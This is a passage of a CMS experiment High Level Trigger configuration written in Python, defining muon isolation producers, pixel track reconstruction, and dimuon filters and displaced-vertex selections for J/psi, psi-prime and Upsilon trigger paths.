UseRejectedHitsOnly = cms.bool( False ),\n HcalAcceptSeverityLevelForRejectedHit = cms.uint32( 9999 ),\n EcalAcceptSeverityLevelForRejectedHit = cms.uint32( 9999 ),\n UseRejectedRecoveredHcalHits = cms.bool( False ),\n UseRejectedRecoveredEcalHits = cms.bool( False ),\n EBGrid = cms.vdouble( ),\n EBWeights = cms.vdouble( ),\n EEGrid = cms.vdouble( ),\n EEWeights = cms.vdouble( ),\n HBGrid = cms.vdouble( ),\n HBWeights = cms.vdouble( ),\n HESGrid = cms.vdouble( ),\n HESWeights = cms.vdouble( ),\n HEDGrid = cms.vdouble( ),\n HEDWeights = cms.vdouble( ),\n HOGrid = cms.vdouble( ),\n HOWeights = cms.vdouble( ),\n HF1Grid = cms.vdouble( ),\n HF1Weights = cms.vdouble( ),\n HF2Grid = cms.vdouble( ),\n HF2Weights = cms.vdouble( ),\n ecalInputs = cms.VInputTag( 'hltEcalRegionalMuonsRecHit:EcalRecHitsEB','hltEcalRegionalMuonsRecHit:EcalRecHitsEE' )\n)\nhltL2MuonIsolations = cms.EDProducer( \"L2MuonIsolationProducer\",\n StandAloneCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n ExtractorPSet = cms.PSet( \n DR_Veto_H = cms.double( 0.1 ),\n Vertex_Constraint_Z = cms.bool( False ),\n Threshold_H = cms.double( 0.5 ),\n ComponentName = cms.string( \"CaloExtractor\" ),\n Threshold_E = cms.double( 0.2 ),\n DR_Max = cms.double( 0.24 ),\n DR_Veto_E = cms.double( 0.07 ),\n Weight_E = cms.double( 1.5 ),\n Vertex_Constraint_XY = cms.bool( False ),\n DepositLabel = cms.untracked.string( \"EcalPlusHcal\" ),\n CaloTowerCollectionLabel = cms.InputTag( \"hltTowerMakerForMuons\" ),\n Weight_H = cms.double( 1.0 )\n ),\n IsolatorPSet = cms.PSet( \n ConeSizes = cms.vdouble( 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24 ),\n ComponentName = cms.string( \"SimpleCutsIsolator\" ),\n EtaBounds = cms.vdouble( 0.0435, 0.1305, 0.2175, 0.3045, 0.3915, 0.4785, 0.5655, 0.6525, 0.7395, 0.8265, 0.9135, 1.0005, 1.0875, 1.1745, 1.2615, 1.3485, 1.4355, 1.5225, 1.6095, 1.6965, 1.785, 1.88, 1.9865, 2.1075, 2.247, 2.411 ),\n Thresholds = cms.vdouble( 4.0, 3.7, 4.0, 3.5, 3.4, 3.4, 3.2, 3.4, 3.1, 2.9, 2.9, 2.7, 3.1, 3.0, 2.4, 2.1, 2.0, 2.3, 2.2, 2.4, 2.5, 2.5, 2.6, 2.9, 3.1, 2.9 )\n )\n)\nhltDiMuon6IsoMuL2Filtered0 = cms.EDFilter( \"HLTMuonIsoFilter\",\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltL2DiMuon6L2PreFiltered0\" ),\n MinN = cms.int32( 2 ),\n saveTags = cms.bool( True ),\n DepTag = cms.VInputTag( 'hltL2MuonIsolations' ),\n IsolatorPSet = cms.PSet( )\n)\nhltDiMuon6LowMassFiltered6 = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOfflineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltL2DiMuon6L2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 6.0 ),\n MinPtMax = cms.double( 4.0 ),\n MinPtMin = cms.double( 4.0 ),\n MinInvMass = cms.double( 5.0 ),\n MaxInvMass = cms.double( 14.5 ),\n MinAcop = cms.double( -9999.0 ),\n MaxAcop = cms.double( 9999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltPixelTracks = cms.EDProducer( \"PixelTrackProducer\",\n useFilterWithES = cms.bool( False ),\n RegionFactoryPSet = cms.PSet( \n ComponentName = cms.string( \"GlobalRegionProducerFromBeamSpot\" ),\n RegionPSet = cms.PSet( \n precise = cms.bool( True ),\n ptMin = cms.double( 0.9 ),\n originRadius = cms.double( 0.2 ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n originHalfLength = cms.double( 24.0 )\n )\n ),\n OrderedHitsFactoryPSet = cms.PSet( \n ComponentName = cms.string( \"StandardHitTripletGenerator\" ),\n SeedingLayers = cms.string( \"hltESPPixelLayerTriplets\" ),\n GeneratorPSet = cms.PSet( \n useBending = cms.bool( True ),\n useFixedPreFiltering = cms.bool( False ),\n maxElement = cms.uint32( 100000 ),\n phiPreFiltering = cms.double( 0.3 ),\n extraHitRPhitolerance = cms.double( 0.06 ),\n useMultScattering = cms.bool( True ),\n ComponentName = cms.string( \"PixelTripletHLTGenerator\" ),\n extraHitRZtolerance = cms.double( 0.06 ),\n SeedComparitorPSet = cms.PSet( ComponentName = cms.string( \"none\" ) )\n )\n ),\n FitterPSet = cms.PSet( \n ComponentName = cms.string( \"PixelFitterByHelixProjections\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n fixImpactParameter = cms.double( 0.0 )\n ),\n FilterPSet = cms.PSet( \n chi2 = cms.double( 1000.0 ),\n nSigmaTipMaxTolerance = cms.double( 0.0 ),\n ComponentName = cms.string( \"PixelTrackFilterByKinematics\" ),\n nSigmaInvPtTolerance = cms.double( 0.0 ),\n ptMin = cms.double( 0.1 ),\n tipMax = cms.double( 1.0 )\n ),\n CleanerPSet = cms.PSet( ComponentName = cms.string( \"PixelTrackCleanerBySharedHits\" ) )\n)\nhltL3MuonIsolations = cms.EDProducer( \"L3MuonIsolationProducer\",\n inputMuonCollection = cms.InputTag( \"hltL3Muons\" ),\n OutputMuIsoDeposits = cms.bool( True ),\n TrackPt_Min = cms.double( -1.0 ),\n CutsPSet = cms.PSet( \n ConeSizes = cms.vdouble( 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24 ),\n ComponentName = cms.string( \"SimpleCuts\" ),\n Thresholds = cms.vdouble( 1.1, 1.1, 1.1, 1.1, 1.2, 1.1, 1.2, 1.1, 1.2, 1.0, 1.1, 1.0, 1.0, 1.1, 1.0, 1.0, 1.1, 0.9, 1.1, 0.9, 1.1, 1.0, 1.0, 0.9, 0.8, 0.1 ),\n maxNTracks = cms.int32( -1 ),\n EtaBounds = cms.vdouble( 0.0435, 0.1305, 0.2175, 0.3045, 0.3915, 0.4785, 0.5655, 0.6525, 0.7395, 0.8265, 0.9135, 1.0005, 1.0875, 1.1745, 1.2615, 1.3485, 1.4355, 1.5225, 1.6095, 1.6965, 1.785, 1.88, 1.9865, 2.1075, 2.247, 2.411 ),\n applyCutsORmaxNTracks = cms.bool( False )\n ),\n ExtractorPSet = cms.PSet( \n Chi2Prob_Min = cms.double( -1.0 ),\n Diff_z = cms.double( 0.2 ),\n inputTrackCollection = cms.InputTag( \"hltPixelTracks\" ),\n ReferenceRadius = cms.double( 6.0 ),\n BeamSpotLabel = cms.InputTag( \"hltOnlineBeamSpot\" ),\n ComponentName = cms.string( \"PixelTrackExtractor\" ),\n DR_Max = cms.double( 0.24 ),\n Diff_r = cms.double( 0.1 ),\n VetoLeadingTrack = cms.bool( True ),\n DR_VetoPt = cms.double( 0.025 ),\n DR_Veto = cms.double( 0.01 ),\n NHits_Min = cms.uint32( 0 ),\n Chi2Ndof_Max = cms.double( 1.0E64 ),\n Pt_Min = cms.double( -1.0 ),\n DepositLabel = cms.untracked.string( \"PXLS\" ),\n BeamlineOption = cms.string( \"BeamSpotFromEvent\" ),\n PropagateTracksToRadius = cms.bool( True ),\n PtVeto_Min = cms.double( 2.0 )\n )\n)\nhltDiMuon6IsoMuL3Filtered6 = cms.EDFilter( \"HLTMuonIsoFilter\",\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDiMuon6LowMassFiltered6\" ),\n MinN = cms.int32( 2 ),\n saveTags = cms.bool( True ),\n DepTag = cms.VInputTag( 'hltL3MuonIsolations' ),\n IsolatorPSet = cms.PSet( )\n)\nhltDisplacedmumuVtxProducerDiMuon6LowMass = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDiMuon6IsoMuL3Filtered6\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 4.0 ),\n MinPtPair = cms.double( 6.0 ),\n MinInvMass = cms.double( 5.0 ),\n MaxInvMass = cms.double( 14.5 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDiMuon6LowMass = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( False ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( 3.0 ),\n MaxNormalisedChi2 = cms.double( 5.0 ),\n MinVtxProbability = cms.double( 0.0 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDiMuon6LowMass\" ),\n BeamSpotTag = cms.InputTag( \"hltOfflineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon7UpsilonBarrel = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltBarrelDimuon7UpsilonL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 6.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 8.5 ),\n MaxInvMass = cms.double( 11.5 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 1.25 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerDimuon7UpsilonBarrel = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltBarrelDimuon7UpsilonL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDimuon7UpsilonBarrel = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDimuon7UpsilonBarrel\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon9UpsilonBarrel = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDimuon9BarrelUpsilonL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 8.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 8.5 ),\n MaxInvMass = cms.double( 11.5 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 1.25 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerDimuon9UpsilonBarrel = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuon9BarrelUpsilonL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDimuon9UpsilonBarrel = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDimuon9UpsilonBarrel\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon9PsiPrime = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDimuon9PsiPrimeL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 8.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 3.35 ),\n MaxInvMass = cms.double( 4.05 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 2.5 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerDimuon9PsiPrime = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuon9PsiPrimeL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDimuon9PsiPrime = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDimuon9PsiPrime\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon10JpsiBarrel = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDimuon10BarrelJpsiL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 9.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 2.8 ),\n MaxInvMass = cms.double( 3.35 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 1.25 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerDimuon10JpsiBarrel = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuon10BarrelJpsiL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDimuon10JpsiBarrel = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDimuon10JpsiBarrel\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon11PsiPrime = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDimuon11PsiPrimeL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 10.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 3.35 ),\n MaxInvMass = cms.double( 4.05 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 2.5 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerDimuon11PsiPrime = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuon11PsiPrimeL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDimuon11PsiPrime = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDimuon11PsiPrime\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon13JpsiBarrel = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDimuon13BarrelJpsiL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 12.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 2.8 ),\n MaxInvMass = cms.double( 3.35 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 1.25 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerDimuon13JpsiBarrel = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuon13BarrelJpsiL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDimuon13JpsiBarrel = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDimuon13JpsiBarrel\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltL1sL1TripleMu0 = cms.EDFilter( \"HLTLevel1GTSeed\",\n L1UseL1TriggerObjectMaps = cms.bool( True ),\n L1NrBxInEvent = cms.int32( 3 ),\n L1TechTriggerSeeding = cms.bool( False ),\n L1UseAliasesForSeeding = cms.bool( True ),\n L1SeedsLogicalExpression = cms.string( \"L1_TripleMu0\" ),\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n L1GtObjectMapTag = cms.InputTag( \"hltL1GtObjectMap\" ),\n L1CollectionsTag = cms.InputTag( \"hltL1extraParticles\" ),\n L1MuonCollectionTag = cms.InputTag( \"hltL1extraParticles\" ),\n saveTags = cms.bool( True )\n)\nhltPreDimuon0JpsiMuon = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltTripleMuonL1Filtered0 = cms.EDFilter( \"HLTMuonL1Filter\",\n CandTag = cms.InputTag( \"hltL1extraParticles\" ),\n PreviousCandTag = cms.InputTag( \"hltL1sL1TripleMu0\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinN = cms.int32( 3 ),\n ExcludeSingleSegmentCSC = cms.bool( False ),\n CSCTFtag = cms.InputTag( \"unused\" ),\n saveTags = cms.bool( True ),\n SelectQualities = cms.vint32( 5, 6, 7 )\n)\nhltTripleMuonL2PreFiltered0 = cms.EDFilter( \"HLTMuonL2PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltTripleMuonL1Filtered0\" ),\n SeedMapTag = cms.InputTag( \"hltL2Muons\" ),\n MinN = cms.int32( 3 ),\n MaxEta = cms.double( 2.5 ),\n MaxDr = cms.double( 9999.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 0.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( True ),\n AbsEtaBins = cms.vdouble( 5.0 ),\n MinNstations = cms.vint32( 0 ),\n MinNhits = cms.vint32( 0 )\n)\nhltTripleMuL3PreFiltered0 = cms.EDFilter( \"HLTMuonL3PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltTripleMuonL2PreFiltered0\" ),\n MinN = cms.int32( 3 ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 0.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( True )\n)\nhltJpsiMuonL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltTripleMuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 0.0 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 2.8 ),\n MaxInvMass = cms.double( 3.35 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerJpsiMuon = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltJpsiMuonL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 